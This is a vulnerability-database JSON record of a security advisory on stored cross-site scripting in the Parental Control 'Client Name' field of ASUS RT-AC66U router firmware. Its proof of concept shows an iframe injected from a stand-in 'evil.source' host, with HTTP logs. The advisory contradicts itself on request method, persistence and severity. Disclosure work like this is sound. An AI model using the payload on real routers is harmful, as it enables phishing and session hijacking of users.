{"id": "VULNERLAB:1993", "vendorId": null, "type": "vulnerlab", "bulletinFamily": "exploit", "title": "ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability", "description": "", "published": "2018-06-27T00:00:00", "modified": "2018-06-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.vulnerability-lab.com/get_content.php?id=1993", "reporter": "Lawrence Amer [zeroattck@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2019-07-10T14:58:33", "viewCount": 110, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:07A8466539FBE60F0745BA8985EE73D1", "THREATPOST:87674040C7E713171787C372FB0D24DB", "THREATPOST:A5DA2027FC2C5FE68AC50C92BE182FB8", "THREATPOST:E6F05C49DD277EEC47DDEFB35F8D2818"]}]}, "exploitation": null, "vulnersScore": 0.0}, "sourceData": "Document Title:\r\n===============\r\nASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttps://www.vulnerability-lab.com/get_content.php?id=1993\r\n\r\n\r\nRelease Date:\r\n=============\r\n2018-06-27\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1993\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n3\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nCross Site Scripting - Persistent\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n500\u20ac - 1.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\n802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports several operation modes to meet \r\ndifferent requirements. Please select the mode that match your situation. Wireless router mode (Default), \r\nAccess Point(AP) mode or Media bridge. In wireless router/ IP sharing mode, RT-AC66U connects to the \r\nInternet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the wireless network to LAN clients or \r\ndevices. In this mode, NAT, firewall, and DHCP server are enabled by default. UPnP and Dynamic DNS \r\nare supported for SOHO and home users. Select this mode if you are a first-time user or you are not \r\ncurrently using any wired/wireless routers. The ASUS RT-AC66U is a 5th gen dual-band Wi-Fi router, \r\nand the launch platform for the new ASUS AiCloud service. Its speed reaches 1.75Gbps, utilizing the \r\nBroadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The 5GHz band supports up to 1.3Gbps, \r\nexceeding current Gigabit wired transmission and 3X faster than 802.11n. The RT-AC66U offers smooth \r\nlag-resistant multitasking and super-fast streaming, while ASUS AiRadar intelligently strengthens wireless \r\nconnections via powerful amplification, offering future-proof optimized performance. \r\n\r\n(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered mutliple cross site scripting vulnerabilities \r\nin the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2018-06-27:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nASUS\r\nProduct: WRT - Wireless Router (UI) 3.0.0.4.372_67\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nLow\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nRestricted authentication (user/moderator) - User privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nLow User Interaction\r\n\r\n\r\nDisclosure Type:\r\n================\r\nIndependent Security Research\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA cross site scripting vulnerability has been discovered in the ASUS Wireless Router RT Firmware v3.0.0.4.372_67.\r\nThe cross site scripting web vulnerability allows remote attackers to inject own malicious script codes on the \r\napplication-side of the vulnerable function or service module.\r\n\r\nThe cross site scripting vulnerability is located in the `Client Name` input field of the `Partental Control` modules. \r\nThe input field for the client name is not secure parsed. Thus allows an attacker to manipulate the client list on index \r\nof the module. The request method to inject is POST and the attack vector is located on the application-side. Due to no \r\nreachable cookies in the panel ui, low privileged user accounts are only able to redirect or inject malware to the \r\nclient-side for an execute. First the context is saved client-side and after using apply function the context is \r\nsaved permanently to the image db.\r\n\r\nThe security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss \r\n(common vulnerability scoring system) count of 3.0. Exploitation of the client-side web vulnerability requires \r\na privileged web-application user account and low user interaction. Successful exploitation of the vulnerability \r\nresults in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and \r\nclient-side manipulation of affected or connected web module context.\r\n\r\nRequest Method(s):\r\n[+] GET\r\n\r\nVulnerable Module(s):\r\n[+] Parental Control\r\n\r\nVulnerable Parameter(s):\r\n[+] Client Name\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe cross site vulnerability can be exploited by remote attackers with privileged user account and low user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\n \r\nPoC: Exploitation\r\n<tbody><tr><th title=\"Select all\" width=\"5%\" height=\"30px\"><input id=\"selAll\" onclick=\"selectAll(this, 0);\" \r\nvalue=\"\" type=\"checkbox\"></th><th width=\"40%\">Clients Name</th><th width=\"25%\">Clients MAC Address</th><th width=\"10%\">\r\nTime Management</th><th width=\"10%\">Add / Delete</th></tr><tr><td style=\"border-bottom:2px solid #000;\" \r\ntitle=\"Enable/Disable\"><input id=\"newrule_Enable\" checked=\"\" type=\"checkbox\"></td><td style=\"border-bottom:2px solid #000;\">\r\n<input maxlength=\"32\" style=\"margin-left:10px;float:left;width:255px;\" class=\"input_20_table\" name=\"PC_devicename\" \r\nonkeypress=\"\" onclick=\"hideClients_Block();\" onblur=\"if(!over_var){hideClients_Block();}\" type=\"text\"><img id=\"pull_arrow\" \r\nsrc=\"images/arrow-down.gif\" onclick=\"pullLANIPList(this);\" title=\"Select the device name of DHCP clients.\" \r\nonmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" height=\"14px;\"><div id=\"ClientList_Block_PC\" class=\"ClientList_Block_PC\">\r\n<a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" onclick=\"setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');\">\r\n<strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" \r\nonclick=\"setClientIP('JIEMING-MACBOOK', '98:4B:E1:CB:DA:D6');\"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK) </div></a>\r\n<a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" onclick=\"setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');\">\r\n<strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div onmouseover=\"over_var=1;\" onmouseout=\"over_var=0;\" \r\nonclick=\"setClientIP('A8:26:D9:31:2B:49', 'A8:26:D9:31:2B:49');\"><strong>192.168.1.210</strong> </div></a>\r\n<!--[if lte IE 6.5]><iframe class=\"hackiframe2\"></iframe><![endif]--></div></td><td style=\"border-bottom:2px solid #000;\">\r\n<input maxlength=\"17\" class=\"input_macaddr_table\" name=\"PC_mac\" onkeypress=\"return is_hwaddr(this,event)\" \r\ntype=\"text\"></td><td style=\"border-bottom:2px solid #000;\">--</td><td style=\"border-bottom:2px solid #000;\">\r\n<input class=\"url_btn\" onclick=\"addRow_main(16)\" value=\"\" type=\"button\"></td></tr><tr id=\"row0\"><td title=\"1\">\r\n<input onclick=\"genEnableArray_main(0,this);\" checked=\"\" type=\"checkbox\"></td><td title=\"\"></td>\r\n<td title=\"aa:aa:aa:aa:aa:aa\">aa:aa:aa:aa:aa:aa</td><td><input class=\"service_btn\" onclick=\"gen_lantowanTable(0);\" \r\nvalue=\"\" type=\"button\"></td><td><input class=\"remove_btn\" onclick=\"deleteRow_main(this);\" value=\"\" type=\"button\"></td></tr>\r\n<tr id=\"row1\"><td title=\"undefined\"><input onclick=\"genEnableArray_main(1,this);\" type=\"checkbox\"></td>\r\n<td title=\"\" <iframe=\"\" src=\"evil.source"\">\"<iframe src=\"evil.source</td\"><td title=\"undefined\">undefined</td>\r\n<td><input class=\"service_btn\" type=\"button\" onclick=\"gen_lantowanTable(1);\" value=\"\"/></td><td><input \r\nclass=\"remove_btn\" type=\"button\" onclick=\"deleteRow_main(this);\" value=\"\"/></td><tr id=\"row2\"><td title=\"undefined\">\r\n<input type=\"checkbox\" onclick=\"genEnableArray_main(2,this);\" /></td><td title=\"\"></td><td title=\"undefined\">undefined</td>\r\n<td><input class=\"service_btn\" type=\"button\" onclick=\"gen_lantowanTable(2);\" value=\"\"/></td><td>\r\n<input class=\"remove_btn\" type=\"button\" onclick=\"deleteRow_main(this);\" value=\"\"/>\r\n</td></tr></table></iframe></td></tr></tbody>\r\n\r\n\r\n--- PoC Session Logs [GET] ---\r\nStatus: 304[Not Modified]\r\nGET http://event.localhost/nw/_ui/en/ParentalControl.html\r\nMime Type[text/html]\r\n Request Header:\r\n Host[event.localhost]\r\n User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]\r\n Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]\r\n Connection[keep-alive]\r\n Upgrade-Insecure-Requests[1]\r\n If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]\r\n If-None-Match[\"31793159796dce1:0\"]\r\n Cache-Control[max-age=0]\r\n Response Header:\r\n Content-Type[text/html]\r\n Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]\r\n Etag[\"31793159796dce1:0\"]\r\n Connection[keep-alive]\r\n-\r\nStatus: 200[OK]\r\nGET http://event.localhost/nw/_ui/en/evil.source%3C/td \r\nMime Type[text/html]\r\n Request Header:\r\n Host[event.localhost]\r\n User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]\r\n Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]\r\n Connection[keep-alive]\r\n Upgrade-Insecure-Requests[1]\r\n Response Header:\r\n Content-Type[text/html]\r\n Server[Microsoft-IIS/7.5]\r\n X-Powered-By[ASP.NET]\r\n Content-Length[1245]\r\n Connection[keep-alive]\r\n\r\n\r\nReference(s):\r\nhttp://event.localhost/\r\nhttp://event.localhost/nw/\r\nhttp://event.localhost/nw/_ui/\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe issue has been reported in 2016 Q4 (2016-11-09) and was finally resolved in 2017 Q3 - Q4 by the asus wrt developer team.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the persistent cross site scripting web vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0).\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nLawrence Amer [zeroattck@gmail.com] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or \r\nimplied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any \r\ncase of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its \r\nsuppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental\r\nor consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface \r\nwebsites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories \r\nor vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, \r\nphone numbers, conversations or anything else to journalists, investigative authorities or private individuals. \r\n\r\nDomains: www.vulnerability-lab.com\t\t- www.vulnerability-db.com\t\t\t\t\t- www.evolution-sec.com\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php \t- vulnerability-lab.com/register.php\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \t- vulnerability-lab.com/rss/rss_upcoming.php \t\t\t- vulnerability-lab.com/rss/rss_news.php\r\nSocial:\t twitter.com/vuln_lab\t\t- facebook.com/VulnerabilityLab \t\t\t\t- youtube.com/user/vulnerability0lab\r\n\r\nAny modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark \r\nof vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2018 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "category": "", "_state": {"dependencies": 1645340353, "score": 1659797217}, "_internal": {"score_hash": "f7796d6623d27848ae5374a27b81f9e2"}}